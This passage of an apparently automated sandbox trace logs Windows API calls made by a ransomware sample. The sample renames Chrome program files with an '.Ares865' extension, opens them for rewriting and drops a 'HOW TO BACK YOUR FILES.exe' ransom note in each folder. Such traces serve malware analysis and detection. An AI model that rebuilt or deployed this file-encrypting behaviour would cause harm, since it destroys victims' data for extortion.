ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5338ed00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0141.303] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0141.303] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7d7940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d7d7940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfe9bf1b1, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x9a9480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="icudtl.dat", cAlternateFileName="")) returned 1 [0141.303] lstrcmpiW (lpString1="icudtl.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0141.303] lstrcmpiW (lpString1="icudtl.dat", lpString2="aoldtz.exe") returned 1 [0141.303] lstrcpyW (in: lpString1=0x2cce47e, lpString2="icudtl.dat" | out: lpString1="icudtl.dat") returned="icudtl.dat" [0141.303] lstrlenW (lpString="icudtl.dat") returned 10 [0141.303] lstrlenW (lpString="Ares865") returned 7 [0141.303] lstrcmpiW (lpString1="dtl.dat", lpString2="Ares865") returned 1 [0141.304] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat.Ares865") returned 81 [0141.304] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\icudtl.dat"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\icudtl.dat.ares865"), dwFlags=0x1) returned 1 [0141.306] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\icudtl.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0141.306] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10130560) returned 1 [0141.482] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Installer" | out: lpString1="Installer") returned="Installer" [0141.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0141.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x92) returned 0x31b108 [0141.482] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0141.482] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7deaf880, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7deaf880, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x76be28f2, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="libegl.dll", cAlternateFileName="")) returned 1 [0141.482] lstrcmpiW (lpString1="libegl.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0141.482] lstrcmpiW (lpString1="libegl.dll", lpString2="aoldtz.exe") returned 1 [0141.483] lstrcpyW (in: lpString1=0x2cce47e, lpString2="libegl.dll" | out: lpString1="libegl.dll") returned="libegl.dll" [0141.483] lstrlenW (lpString="libegl.dll") returned 10 [0141.483] lstrlenW (lpString="Ares865") returned 7 [0141.483] lstrcmpiW (lpString1="egl.dll", lpString2="Ares865") returned 1 [0141.483] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libegl.dll.Ares865") returned 81 [0141.483] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libegl.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libegl.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libegl.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libegl.dll.ares865"), dwFlags=0x1) returned 1 [0141.486] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libegl.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libegl.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0141.486] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=100696) returned 1 [0141.494] lstrcpyW (in: lpString1=0x2cce47e, lpString2="libglesv2.dll" | out: lpString1="libglesv2.dll") returned="libglesv2.dll" [0141.494] lstrlenW (lpString="libglesv2.dll") returned 13 [0141.494] lstrlenW (lpString="Ares865") returned 7 [0141.494] lstrcmpiW (lpString1="sv2.dll", lpString2="Ares865") returned 1 [0141.495] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libglesv2.dll.Ares865") returned 84 [0141.495] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libglesv2.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libglesv2.dll"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libglesv2.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libglesv2.dll.ares865"), dwFlags=0x1) returned 1 [0141.496] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libglesv2.dll.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libglesv2.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0141.497] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3767640) returned 1 [0141.967] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Locales" | out: lpString1="Locales") returned="Locales" [0141.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0141.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x336fc8 [0141.967] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0141.967] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d896020, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d896020, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfea2818c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x380630, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nacl_irt_x86_64.nexe", cAlternateFileName="NACL_I~1.NEX")) returned 1 [0141.967] lstrcmpiW (lpString1="nacl_irt_x86_64.nexe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0141.967] lstrcmpiW (lpString1="nacl_irt_x86_64.nexe", lpString2="aoldtz.exe") returned 1 [0141.967] lstrcpyW (in: lpString1=0x2cce47e, lpString2="nacl_irt_x86_64.nexe" | out: lpString1="nacl_irt_x86_64.nexe") returned="nacl_irt_x86_64.nexe" [0141.967] lstrlenW (lpString="nacl_irt_x86_64.nexe") returned 20 [0141.967] lstrlenW (lpString="Ares865") returned 7 [0141.967] lstrcmpiW (lpString1="64.nexe", lpString2="Ares865") returned -1 [0141.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe.Ares865") returned 91 [0141.968] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\nacl_irt_x86_64.nexe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\nacl_irt_x86_64.nexe.ares865"), dwFlags=0x1) returned 1 [0141.975] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\nacl_irt_x86_64.nexe.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\nacl_irt_x86_64.nexe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0141.975] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3671600) returned 1 [0142.153] lstrcpyW (in: lpString1=0x2cce47e, lpString2="natives_blob.bin" | out: lpString1="natives_blob.bin") returned="natives_blob.bin" [0142.153] lstrlenW (lpString="natives_blob.bin") returned 16 [0142.153] lstrlenW (lpString="Ares865") returned 7 [0142.153] lstrcmpiW (lpString1="lob.bin", lpString2="Ares865") returned 1 [0142.153] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin.Ares865") returned 87 [0142.153] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\natives_blob.bin"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\natives_blob.bin.ares865"), dwFlags=0x1) returned 1 [0142.156] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\natives_blob.bin.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\natives_blob.bin.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.156] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262947) returned 1 [0142.174] lstrcpyW (in: lpString1=0x2cce47e, lpString2="resources.pak" | out: lpString1="resources.pak") returned="resources.pak" [0142.174] lstrlenW (lpString="resources.pak") returned 13 [0142.174] lstrlenW (lpString="Ares865") returned 7 [0142.174] lstrcmpiW (lpString1="ces.pak", lpString2="Ares865") returned 1 [0142.175] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak.Ares865") returned 84 [0142.175] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\resources.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\resources.pak.ares865"), dwFlags=0x1) returned 1 [0142.178] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\resources.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.178] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18376476) returned 1 [0142.348] lstrcpyW (in: lpString1=0x2cce47e, lpString2="snapshot_blob.bin" | out: lpString1="snapshot_blob.bin") returned="snapshot_blob.bin" [0142.348] lstrlenW (lpString="snapshot_blob.bin") returned 17 [0142.348] lstrlenW (lpString="Ares865") returned 7 [0142.348] lstrcmpiW (lpString1="lob.bin", lpString2="Ares865") returned 1 [0142.349] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin.Ares865") returned 88 [0142.349] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\snapshot_blob.bin"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\snapshot_blob.bin.ares865"), dwFlags=0x1) returned 1 [0142.351] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\snapshot_blob.bin.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\snapshot_blob.bin.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.352] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1449400) returned 1 [0142.424] lstrcpyW (in: lpString1=0x2cce47e, lpString2="VisualElements" | out: lpString1="VisualElements") returned="VisualElements" [0142.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0142.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9c) returned 0x320fc8 [0142.424] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0142.424] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 1 [0142.424] lstrcmpiW (lpString1="WidevineCdm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0142.424] lstrcmpiW (lpString1="WidevineCdm", lpString2="aoldtz.exe") returned 1 [0142.424] lstrcpyW (in: lpString1=0x2cce47e, lpString2="WidevineCdm" | out: lpString1="WidevineCdm") returned="WidevineCdm" [0142.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0142.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x96) returned 0x31b1a8 [0142.425] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0142.425] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 0 [0142.425] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0142.425] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0142.425] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm" [0142.425] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm" [0142.425] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0142.425] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0142.427] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.427] GetLastError () returned 0x0 [0142.429] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0142.429] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0142.429] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0142.429] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0142.429] lstrcpyW (in: lpString1=0x2cce496, lpString2="manifest.json" | out: lpString1="manifest.json") returned="manifest.json" [0142.429] lstrlenW (lpString="manifest.json") returned 13 [0142.429] lstrlenW (lpString="Ares865") returned 7 [0142.429] lstrcmpiW (lpString1="st.json", lpString2="Ares865") returned 1 [0142.430] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json.Ares865") returned 96 [0142.430] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\manifest.json"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0142.432] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\manifest.json.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.432] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=950) returned 1 [0142.435] lstrcpyW (in: lpString1=0x2cce496, lpString2="_platform_specific" | out: lpString1="_platform_specific") returned="_platform_specific" [0142.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0142.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x33afc8 [0142.435] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0142.435] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_platform_specific", cAlternateFileName="_PLATF~1")) returned 0 [0142.435] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0142.435] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0142.435] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific" [0142.435] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific" [0142.436] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0142.436] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\widevinecdm\\_platform_specific\\how to back your files.exe"), bFailIfExists=1) returned 0 [0142.436] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.437] GetLastError () returned 0x0 [0142.437] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0142.437] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0142.437] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0142.437] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0142.437] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="win_x64" | out: lpString1="win_x64") returned="win_x64" [0142.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0142.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xcc) returned 0x2d4180 [0142.438] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0142.438] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533b4e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x533b4e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="win_x64", cAlternateFileName="")) returned 0 [0142.438] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0142.438] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0142.438] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64" [0142.438] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64" [0142.438] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0142.438] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files 